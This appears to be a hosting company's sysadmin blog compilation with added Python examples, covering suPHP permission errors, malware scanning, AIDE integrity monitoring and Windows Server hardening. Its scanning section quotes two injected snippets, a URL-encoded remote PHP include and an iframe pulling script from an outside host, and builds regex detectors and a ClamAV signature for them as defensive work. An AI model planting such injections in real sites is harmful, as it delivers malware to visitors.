Why are you getting 500 Internal Server Error on your PHP pages

Usually this happens in a suPHP environment. There are a few reasons why it can happen; we list some of them here. The solutions are intended for those with shell access.

  • Ownership issues
    In a suPHP environment, depending on the mode in which suPHP is enabled on the VPS or server, there is a min_uid setting, configurable in suphp.conf under /etc, /usr/local/etc or /opt/suphp/etc. By default the setting is 100, which means that if a file is owned by a UID below that value (100), suPHP will not execute the PHP code and the request ends in a 500 Internal Server Error. On a cPanel server the error is logged in /usr/local/apache/logs/suphp.log. This restriction improves security, since even if a PHP script manages some privilege escalation, it won't affect the server. The solution is

    chown your_username:your_username path_of_your_php_file

    If that fixes only that file and you need to change all your PHP files, use the commands below.

    find . -type f -name "*.php" -exec chown username:username {} \;
    find . -type d -exec chown username:username {} \;

    Drop the -name "*.php" test from the first command if a PHP file still errors out. If that still doesn't fix it, move on to the other solutions below.

  • Permission issues
    World-writable directories or files can also cause the issue. In a non-suPHP environment, if a PHP script has to upload a file into a folder (e.g. a PHP-based gallery script where customers upload photos), that folder needs world-writable permissions, or else Apache can't write to it. Under suPHP the PHP code runs as the user, who already has write permission, so you don't need 777 permissions; 755 (rwxr-xr-x) is enough, and world-writable files and directories are exactly what suPHP refuses to run. When a customer is moved from a non-suPHP environment to a suPHP-enabled server, the permissions need adjusting. The commands below usually help:

    find . -name "*.php" -type f -exec chmod 644 {} \;
    find . -type d -exec chmod 755 {} \;

    You can usually run the first command without the -name "*.php" test as well.

  • suphp.log exceeds 2GB in size
    If every PHP application on the server gives an Internal Server Error, the next likely cause is that the suPHP log has grown past 2GB. Just truncate the file and you are back on track. To empty it, run the command below, which assumes the issue is on a cPanel server:

    cat /dev/null > /usr/local/apache/logs/suphp.log

  • suphp.log doesn't exist
    On Plesk, Webmin or other servers, suPHP is often installed but /var/log/httpd, or whichever folder suphp.log is supposed to be created in, doesn't exist. suPHP can create a missing suphp.log itself, but you need to create the folder /var/log/httpd manually. I hope you know how to create a folder though.
  • If you know any other cases which require another solution for this, please comment here or edit the blog.
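As an added illustration (not code from the original post, from suPHP or from cPanel), the script below audits a document root for the two causes covered by the first two bullets, files owned by a UID below min_uid and world-writable or wrongly-moded files and directories, and prints the chown/chmod commands from above as a dry run instead of applying them. The sample tree and the account name your_username are constructed here.

```python
"""Audit a web tree for the two suPHP causes of 500 errors discussed above:
files owned by a UID below min_uid and world-writable files or directories.
Added illustration, not part of suPHP or cPanel. Nothing is changed on disk;
plan_fixes() only returns the chown/chmod commands you would run."""
import os
import stat
import tempfile
from collections import namedtuple

# One record per filesystem entry: path, owner UID, permission bits, directory flag.
Entry = namedtuple("Entry", "path uid mode is_dir")


def collect(root):
    """Walk root with lstat (symlinks are skipped, not followed) into Entry records."""
    entries = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue
            entries.append(Entry(path, st.st_uid, stat.S_IMODE(st.st_mode),
                                 stat.S_ISDIR(st.st_mode)))
    return entries


def audit(entries, min_uid=100, expected_uid=None):
    """Group the problems suPHP would refuse on.

    min_uid mirrors the min_uid setting in suphp.conf (default 100);
    expected_uid, if given, is the UID of the account that should own the tree."""
    report = {"low_uid": [], "wrong_owner": [], "world_writable": [], "bad_mode": []}
    for e in entries:
        if e.uid < min_uid:
            report["low_uid"].append(e.path)
        elif expected_uid is not None and e.uid != expected_uid:
            report["wrong_owner"].append(e.path)
        if e.mode & stat.S_IWOTH:
            report["world_writable"].append(e.path)
        # Directories should be 755 and PHP files 644, as in the find commands above.
        if e.is_dir or e.path.endswith(".php"):
            want = 0o755 if e.is_dir else 0o644
            if e.mode != want:
                report["bad_mode"].append((e.path, e.mode, want))
    return report


def plan_fixes(report, username):
    """Return the chown/chmod commands that would repair the report (dry run)."""
    cmds = [f"chown {username}:{username} {p}"
            for p in report["low_uid"] + report["wrong_owner"]]
    cmds += [f"chmod {want:o} {p}" for p, _have, want in report["bad_mode"]]
    return cmds


def build_sample_tree():
    """Constructed sample tree (not from the page): an upload dir left at 777
    from a non-suPHP host and a PHP file at 666."""
    root = tempfile.mkdtemp(prefix="suphp_audit_")
    uploads = os.path.join(root, "uploads")
    os.mkdir(uploads)
    with open(os.path.join(root, "index.php"), "w") as f:
        f.write("<?php echo 'ok'; ?>\n")
    with open(os.path.join(uploads, "gallery.php"), "w") as f:
        f.write("<?php // upload handler ?>\n")
    os.chmod(os.path.join(root, "index.php"), 0o644)
    os.chmod(os.path.join(uploads, "gallery.php"), 0o666)
    os.chmod(uploads, 0o777)
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    report = audit(collect(root), min_uid=100)
    for line in plan_fixes(report, "your_username"):
        print(line)
```

Run it against a real document root by passing that path to collect() and the account's UID as expected_uid; review the printed commands before running any of them, since a tree that also contains files the account should not own (for example a shared include tree) would otherwise be chowned along with it.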


How to do virus scan on Linux servers ?

Do you really need to do a virus scan on Linux servers? Sometimes, yes. With the recent wave of iframe, PHP include and JS injections, it seems we need to scan pages for injections like the two below:

< ? php include(urldecode("%68%74%74%70%3a%2f%2f%62%75%79%34%6d%65%2e%69%6e%66%6f%2f%73%63%72%2f%31%30%2e%74%78%74")); ? >
< iframe src=http://ms.nesseseni.cn/src.js >< /iframe >

Below are a few URLs which could help you in the process

http://www.google.com/safebrowsing/diagnostic?site=http://supportsages.com
http://www.malwaredomains.com/
http://www.malwaredomainlist.com/mdl.php – A regularly updated list.

You can install ClamAV, which is open source, and run a scan to make sure the website is not affected. On a cPanel server, the command below scans the website files of every user.

clamscan -i -r --remove /home/*/public_html/

Why would I recommend ClamAV over other, paid antivirus products? For the obvious reason that you can extend ClamAV's rules with more iframe detection rules. Just write new regex rules into the ClamAV virus databases and you have the situation under control, at least for the iframe code that matches.
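The detection side of the above, as an added example that is not part of the original post or of ClamAV: a scanner for the two injection patterns shown earlier that decodes the urlencode()d include target to expose the host it points at, plus a helper that turns a matched literal into a ClamAV .ndb signature line you can load with clamscan -d. The sample site is constructed here and embeds the two snippets from the post. Run clamscan without --remove first and review the hits, because --remove deletes every file it matches.

```python
"""Detect the two injection patterns shown above in web files and turn a hit
into a ClamAV .ndb signature line. Added example, not the ClamAV project's code;
the sample files are constructed here and the .ndb line follows ClamAV's
Name:TargetType:Offset:HexString body-signature format."""
import os
import re
import tempfile
from urllib.parse import unquote, urlparse

# include(urldecode("%68%74...")): a remote include hidden behind URL-encoding.
INCLUDE_RE = re.compile(
    r'include\s*\(\s*urldecode\s*\(\s*["\']([^"\']+)["\']\s*\)\s*\)', re.I)
# <iframe src=...>: an injected frame pulling in an external script or page.
IFRAME_RE = re.compile(r'<iframe\b[^>]*\bsrc\s*=\s*["\']?([^\s"\'>]+)', re.I)


def scan_text(text):
    """Return (kind, decoded_url, host) for every match in one file's text."""
    findings = []
    for m in INCLUDE_RE.finditer(text):
        url = unquote(m.group(1))          # reveal the hidden URL
        findings.append(("php_include", url, urlparse(url).hostname or ""))
    for m in IFRAME_RE.finditer(text):
        url = m.group(1)
        findings.append(("iframe", url, urlparse(url).hostname or ""))
    return findings


def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Map each file under root that contains a finding to its findings."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as f:
                text = f.read().decode("utf-8", errors="replace")
            found = scan_text(text)
            if found:
                hits[path] = found
    return hits


def ndb_signature(name, literal):
    """Build a ClamAV .ndb line (target type 0 = any file, offset * = anywhere).
    Save such lines to a .ndb file and pass it to clamscan with -d."""
    return f"{name}:0:*:{literal.encode().hex()}"


def build_sample_site():
    """Constructed sample site: one clean page and one carrying both injections
    quoted in the post above."""
    root = tempfile.mkdtemp(prefix="webscan_")
    with open(os.path.join(root, "about.php"), "w") as f:
        f.write("<?php echo 'clean page'; ?>\n")
    with open(os.path.join(root, "index.php"), "w") as f:
        f.write('<?php include(urldecode("%68%74%74%70%3a%2f%2f%62%75%79%34%6d%65'
                '%2e%69%6e%66%6f%2f%73%63%72%2f%31%30%2e%74%78%74")); ?>\n'
                '<iframe src=http://ms.nesseseni.cn/src.js></iframe>\n')
    return root


if __name__ == "__main__":
    for path, found in scan_tree(build_sample_site()).items():
        for kind, url, host in found:
            print(f"{path}: {kind} -> {host} ({url})")
    print(ndb_signature("Injected.Iframe.Sample", "<iframe src=http://ms.nesseseni.cn/"))
```

The scanner reports hosts rather than deleting anything, so the output can be checked against the blocklists linked above before any file is cleaned; the .ndb helper is for the case where the same injected literal turns up across many accounts and you want clamscan to flag it server-wide.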

Another solution would be mod_security 2.5, which can help prevent page alteration through SQL injection and JavaScript injection, and the threats detailed in http://www.gnucitizen.org/blog/atom-2/

So far I was talking about server security. Once infected, there are a few things the client has to do as well.

1. Scan your machine, as well as your webmaster's, with anti-virus and anti-spyware tools.
2. Once you are sure your computer is clean, change all site passwords. (You might want to change computer and network passwords too.)
3. Now keep the new passwords secure. Don’t use auto-upload features of your WYSIWYG editors or in your FTP browsers. Enter passwords every time you upload new content instead. Use SFTP instead of FTP if possible. Only a few hosts offer sftp though.
4. If your site was flagged by Google at http://www.google.com/safebrowsing/diagnostic , request a malware review via Webmaster Tools.
5. Regularly check your site with diagnostics tools of your choice (like Unmask Parasites ) to be sure your site is clean.


AIDE to aid your server security needs

A note on Intrusion Detection System
An intrusion detection system (IDS) is software or hardware designed to detect unwanted attempts at accessing, manipulating and/or disabling computer systems through a network. Some of the best-known IDS applications are Snort, Untangle, Tripwire, AIDE etc. Among the simplest to configure and use is AIDE.

What is AIDE
AIDE (Advanced Intrusion Detection Environment) is an intrusion detection program. It is a free replacement for Tripwire. AIDE constructs a database of the files specified in AIDE's configuration file. The AIDE database stores various file attributes like permissions, inode number, user, group, file size, mtime, ctime, atime, growing size, number of links and link name. AIDE also creates a cryptographic checksum or hash of each file using message digest algorithms like sha, md5, rmd160, tiger etc. ACLs, extended attributes and the SELinux context can also be recorded if enabled at compile time.

Initially the administrator has to create an AIDE database on a new server before it is set up for networking or business (e.g. hosting). This AIDE database is a summary of the system in its normal state. It holds information about system binaries, libraries, header files etc. that are expected to remain the same over time.

Suppose someone has broken into the system: though it is easy to manipulate file dates, sizes etc., it will be quite difficult for him to manipulate a cryptographic checksum like md5. Thus by rerunning AIDE after a break-in, the administrator can quickly identify changed files with a high degree of accuracy.

AIDE Compilation
Some of the prerequisites (packages) for AIDE are:

  • GCC compiler for C (gcc)
  • GNU Flex (flex)
  • GNU Bison (bison)
  • GNU Make (make)
  • Mhash library (libmhash2 and libmhash-dev)
  • PostgreSQL Development Library (postgresql-server-dev)

Simple instructions using Ubuntu
Firstly become root by using the given command and then supplying your password:
sudo su -

For each prerequisite (say package gcc) search if it is installed or not by:
dpkg --get-selections | grep gcc

If you get:
gcc-4.3        install
then gcc is installed otherwise if you get no output then it means that gcc is not installed.

If the package gcc is not installed then use:
sudo apt-get install gcc

Once all the packages are installed, download AIDE from sourceforge.net/projects/aide. It will be a gzipped tar archive.

Create a folder named packages and extract the tar archive into it with:
tar -xzvf aide-x.xx.x.tar.gz (replace x.xx.x with the version number)
A folder named aide-x.xx.x is now created.

Change into that folder:
cd aide-x.xx.x

Now execute:
./configure
make
make install
make clean

Open the aide config file and find where the AIDE database is stored. Go to that location.

To initialise the database perform:
aide -i
mv aide.db.new aide.db
then to check if aide works execute:
aide

Configuration of AIDE
AIDE's config file is /usr/local/etc/aide.conf (or /etc/aide/aide.conf if installed via package management software like Synaptic).
Its default executable is /usr/local/bin/aide.

Explanation of the aide.conf file

database=file:/var/lib/aide/aide.db
location of the database to be read (This is the database taken as benchmark)

database_new=file:/var/lib/aide/aide.db.comp
location of the database read for --compare (This is not present by default and is used only when we have to compare two distinct databases.)

database_out=file:/var/lib/aide/aide.db.new
location of the database to be written

AIDE uses a set of rules to determine what to check for within a particular file or directory. This is found inside aide.conf. These rules are also called groups.

#p:      permissions
#i:      inode
#n:      number of links
#l:      link name
#u:      user
#g:      group
#s:      size
#b:      block count
#m:      mtime
#a:      atime
#c:      ctime
#S:      check for growing size
#I:      ignore changed filename
#md5:    md5 checksum
#sha1:   sha1 checksum
#sha256: sha256 checksum
#sha512: sha512 checksum
#rmd160: rmd160 checksum
#tiger:  tiger checksum
#haval:  haval checksum
#crc32:  crc32 checksum
#E:        Empty group
#>:      Growing logfile p+l+u+g+i+n+S

These basic attributes are combined into custom rules that define which checks apply together; for example 'pug: p+u+g' means pug checks permissions, user and group. You can also create your own custom rules:

#R:      p+i+l+n+u+g+s+m+c+acl+selinux+xattrs+md5
#L:      p+i+l+n+u+g+acl+selinux+xattrs
#MyRule: p+i+l+n+u+g

The following are available if you have mhash support enabled:

#gost:   gost checksum
#whirlpool: whirlpool checksum

The following are available when explicitly enabled using configure:

#acl:    access control list
#selinux: SELinux security context
#xattr:  extended file attributes

AIDE has three types of selection lines

  • Regular selection lines, beginning with "/". The line is a file/directory path, with or without regular expressions, followed by the rule to use for it.
  • Equals selection lines, beginning with "=". The line is followed by a path to a directory/file and tells AIDE not to apply the rule to any subdirectory or file below it.
  • Negative selection lines, beginning with "!". The line is followed by a path to a directory/file and tells AIDE which files/directories to leave out of the database.

Next we have to decide which directories/files we want in the database:

/etc p+i+u+g     #check only permissions, inode, user and group for etc
/bin MyRule      # apply the custom rule to the files in bin
/sbin MyRule     # apply the same custom rule to the files in sbin
/var MyRule
!/var/log/.*     # ignore the log dir it changes too often
!/var/spool/.*   # ignore spool dirs as they change too often
!/var/adm/utmp$  # ignore the file /var/adm/utmp

URLs that can be used
The database and database_out directives in aide.conf take URLs, which can be any of the following. Input URLs cannot be used as outputs and vice versa.

stdout, stderr
Output is sent to stdout or stderr respectively.

stdin
Input is read from stdin.

file://filename
Input is read from filename or output is written to filename.

fd:number
Input is read from file descriptor number or output is written to it.

Useful Commands
aide -C : Performs a check on the filesystem (same as running aide with no options)
aide -i : Initialises or creates the benchmark database supplied by database_out directive (here it is aide.db.new)
aide -u -c /etc/aide.conf : update the database and use the specified config file

Usage
Before putting a server on the network, the admin has to save a secure baseline of the system by:

aide -i

mv aide.db.new aide.db

The second command replaces the server's earlier state (the aide.db database) with the new one (aide.db.new), so be careful when you do this. It is advisable to keep a backup of the earlier database.

Next time, in order to check for any break-in, run
aide
or
aide -C

To compare the current database with an earlier backed-up database, give the path of the backed-up database to the database_new option in aide.conf and run:
aide --compare

The task of saving the old database and comparing with a new one has to be done periodically (preferably daily with the help of a cron task).
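To make the rule groups, the three kinds of selection lines and the init/check/compare workflow concrete, here is an added toy integrity checker. It is not AIDE's code, database format or exact matching logic: it expands groups such as MyRule, applies "/", "=" and "!" lines to a tree, takes a baseline the way aide -i does and diffs it the way aide or aide --compare reports. The rules, selection lines and sample tree are constructed here, and the rule that the first matching selection line wins is this toy's simplification.

```python
"""Toy integrity checker illustrating the AIDE concepts above: attribute groups
(p+u+g+sha256 ...), '/', '=' and '!' selection lines, a baseline taken at init
and a check reporting added, removed and changed paths. Added illustration only,
not AIDE's code, database format or matching rules; rules and tree are constructed."""
import hashlib
import os
import re
import stat
import tempfile


def expand(expr, groups):
    """Expand 'p+i+MyRule' into a set of basic attributes using known groups."""
    attrs = set()
    for tok in expr.split("+"):
        attrs |= groups.get(tok.strip(), {tok.strip()})
    return attrs


def parse_rules(lines):
    """Parse 'Name: a+b+c' definitions; later lines may reuse earlier names."""
    groups = {}
    for line in lines:
        name, _, rhs = line.partition(":")
        groups[name.strip()] = expand(rhs, groups)
    return groups


def parse_selection(lines, groups):
    """Return (kind, regex, attrs) per line: '/' regular, '=' equals, '!' negative."""
    sel = []
    for line in lines:
        line = line.split("#", 1)[0].strip()      # drop trailing comments
        if not line:
            continue
        kind = line[0] if line[0] in "=!" else "/"
        parts = line.lstrip("=!").split()
        attrs = expand(parts[1], groups) if len(parts) > 1 else set()
        sel.append((kind, re.compile(parts[0]), attrs))
    return sel


def select(vpath, selections):
    """Attributes to record for vpath, or None if it is out of scope.
    Negative lines win; otherwise the first matching line applies (toy rule).
    Regular lines match as a prefix, equals lines must match the whole path."""
    for kind, rx, _ in selections:
        if kind == "!" and rx.match(vpath):
            return None
    for kind, rx, attrs in selections:
        if (kind == "/" and rx.match(vpath)) or (kind == "=" and rx.fullmatch(vpath)):
            return attrs
    return None


def attributes(path, attrs):
    """Collect the requested attributes of one path, keyed by AIDE's letters."""
    st = os.lstat(path)
    fields = {"p": stat.S_IMODE(st.st_mode), "i": st.st_ino, "n": st.st_nlink,
              "u": st.st_uid, "g": st.st_gid, "s": st.st_size,
              "m": int(st.st_mtime), "c": int(st.st_ctime)}
    rec = {k: v for k, v in fields.items() if k in attrs}
    if "sha256" in attrs and stat.S_ISREG(st.st_mode):
        with open(path, "rb") as f:
            rec["sha256"] = hashlib.sha256(f.read()).hexdigest()
    return rec


def snapshot(root, selections):
    """Build the database: virtual path ('/' stands for root) -> attributes."""
    db = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            vpath = "/" + os.path.relpath(full, root)
            attrs = select(vpath, selections)
            if attrs:
                db[vpath] = attributes(full, attrs)
    return db


def compare(old, new):
    """Diff two databases the way 'aide' or 'aide --compare' reports it."""
    changed = {}
    for p in set(old) & set(new):
        diff = sorted(k for k in old[p] if old[p][k] != new[p].get(k))
        if diff:
            changed[p] = diff
    return {"added": sorted(set(new) - set(old)),
            "removed": sorted(set(old) - set(new)), "changed": changed}


# Constructed rules and selection lines mirroring the aide.conf fragments above.
SAMPLE_RULES = ["pug: p+u+g", "MyRule: p+i+n+u+g+sha256"]
SAMPLE_SELECTION = ["/etc pug          # permissions, user and group only",
                    "/bin MyRule",
                    "/var MyRule",
                    "!/var/log/.*      # ignore the log dir, it changes too often"]


def build_sample_tree():
    """Constructed mini filesystem to snapshot."""
    root = tempfile.mkdtemp(prefix="aide_toy_")
    for rel, body in [("etc/passwd", "root:x:0:0\n"), ("bin/ls", "#!/bin/sh\nls\n"),
                      ("var/log/messages", "boot\n"), ("var/lib/state", "ok\n")]:
        os.makedirs(os.path.join(root, os.path.dirname(rel)), exist_ok=True)
        with open(os.path.join(root, rel), "w") as f:
            f.write(body)
    return root


def tamper(root):
    """Simulate a binary being replaced in place (same inode, new content)."""
    with open(os.path.join(root, "bin", "ls"), "w") as f:
        f.write("#!/bin/sh\n# replaced copy\nls\n")


if __name__ == "__main__":
    root = build_sample_tree()
    sel = parse_selection(SAMPLE_SELECTION, parse_rules(SAMPLE_RULES))
    baseline = snapshot(root, sel)        # aide -i; mv aide.db.new aide.db
    tamper(root)
    print(compare(baseline, snapshot(root, sel)))   # aide / aide -C
```

Note what the report does and does not say: /bin/ls shows up only under "changed" with sha256, because MyRule records the hash but not size or mtime, while /var/log/messages never appears because the negative line excludes it; that is the trade-off behind choosing the rule for each path in the real aide.conf.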

Reference Links

http://www.cs.tut.fi/~rammer/aide.html (Home Page)

http://sourceforge.net/projects/aide (Sourceforge Project Page)

http://www.cs.tut.fi/~rammer/aide/manual.html (Manual Page)

http://www.securityfocus.com/infocus/1424 (Reference)

http://www.penguin-soft.com/penguin/man/5/aide.conf.html (Reference)


Initial Hardening or Securing and performance tweaking of a Windows Server 2003 – Part I

I am hereby giving a brief howto on securing a default Windows Server 2003. 90% of the sages at SupportSages are Unix fanatics and I am a rebel belonging to the remaining 10% :) But we often get requests to secure Windows servers, hence this brief on the basic steps we should take. As the lead sage says, security is a process that starts even before the installation of the OS or the design of a network and can't be done in a day or two; only the initial hardening can be. So the steps mentioned here are just the initial hardening. I would love to add more based on your suggestions. I will cover the fundamentals of troubleshooting and fixing Windows permission issues in another post. This post is for a standalone server, not a member of an AD (Active Directory) domain.

For all the TUI/CLI guys out there: did you know MS Windows Server 2008 can run without a GUI? You just have to install Server Core. You can then command Windows to do what you want :-)

Subscribe to MS's security bulletin list at http://technet.microsoft.com/hi-in/security/dd252948(en-us).aspx

Disable all services you do not need

Distributed File System
Distributed Link Tracking Client
Distributed Link Tracking Server
Fax Service
Indexing Service
Netmeeting Remote Desktop Sharing
Print Spooler
Telnet

Services you may or may not disable, if not already disabled. Usually a server installation turns these off. Did you know that out of 86 default installed services, 43 are disabled by default?

ClipBook
Computer Browser (On a server do you want this ?)
Help and Support (Again, don’t you have other sages around you for this?)
IMAPI CD-Burning COM Service (Don't need this)
Messenger
Remote Registry
TCP/IP NetBIOS Helper

Harden the TCP/IP Stack

Just like you do in Linux by editing sysctl.conf, you can configure various TCP/IP parameters in the Windows registry in order to protect against network-level denial of service attacks including SYN flood attacks, ICMP attacks and SNMP attacks. You can configure registry keys to:

* Enable SYN flood protection when an attack is detected.
* Set threshold values that are used to determine what constitutes an attack.

Follow the HowTo at http://msdn.microsoft.com/en-us/library/aa302363.aspx

Renaming the Administrator and Guest Account to something else.

Follow the Howto @ http://support.microsoft.com/kb/816109

In that howto, the AD Users and Computers snap-in is opened by selecting "Start", "Programs", "Administrative Tools", "Active Directory Users and Computers", or by simply typing dsa.msc in Start -> Run.

Enabling HTTP Compression

This is not security related, but may improve performance. It was taken from a website and is included here as well. But remember that the Horde error for the Middle East described earlier in one of the posts can creep in.

Check out the URL http://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/d52ff289-94d3-4085-bc4e-24eb4f312e0e.mspx?mfr=true

Disable parent paths (if enabled)

If we are doing monthly management of the server, don't enable parent paths on a hosting firm's server even if the customer asks for it; there are lots of risks. The good thing is that in IIS 6.0 it is disabled by default. Ask the developers to use absolute paths. If it is enabled, disable it. But on a live production server, communicate with the firm's contact person before disabling parent paths, as it may break websites that use them.

  • Start the Internet Services Manager (Start - Programs - Administrative Tools - Internet Services Manager)
  • Right click on the web site and select properties
  • Select the ‘Home Directory’ tab
  • Click the ‘Configuration’ button under the Application Settings
  • Select the ‘App Options’ tab
  • Uncheck the ‘Enable parent paths’ box and click Apply

The article at http://support.microsoft.com/kb/q226474/ explains how to enable it, but it is for reference only.

Use Dedicated Application pools

Again performance related: always try to isolate websites using dedicated application pools. You can define them in IIS, or in many control panels it is just a click of a button or an option to be checked. An error in one dedicated pool will not affect other pools and hence other websites. This is also helpful when troubleshooting and debugging issues.

Changing the RDC or Remote desktop port

Open the registry with regedit and browse to

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp

and change the PortNumber value to a non-default port above 1024.

On Server 2008, in addition to changing the registry value above, you also need to create a new inbound TCP rule in the Windows firewall to allow connections on the new port. You can then disable the existing Remote Desktop inbound rule (which is hard-coded to port 3389) and/or add a new one for your port. The command below should work as well:

netsh advfirewall firewall add rule name="New Remote desktop" dir=in action=allow protocol=TCP localport=NEW_PORT_NO

Refer http://support.microsoft.com/kb/947709 for more help on writing firewall rules.

If working on a hacked or suspected hack system, keep the Security Identifier list available at http://support.microsoft.com/kb/243330 handy.

Lots of tools useful for forensics and daily auditing purposes will be coming on next post or even this post itself will get re-published. Till then read about IPTables equivalent in windows (oh..No..Kinda equivalent) http://support.microsoft.com/kb/813878


About this blog

This blog acts as a knowledge repository for the world and is unofficial! Anything we find interesting in the cyber world will go here. In most cases, this blog will reflect the happiness of our staff in reaching a successful solution to an issue (s)he worked on, and serve as a reference for other fellow SAGEs who come across similar issues later.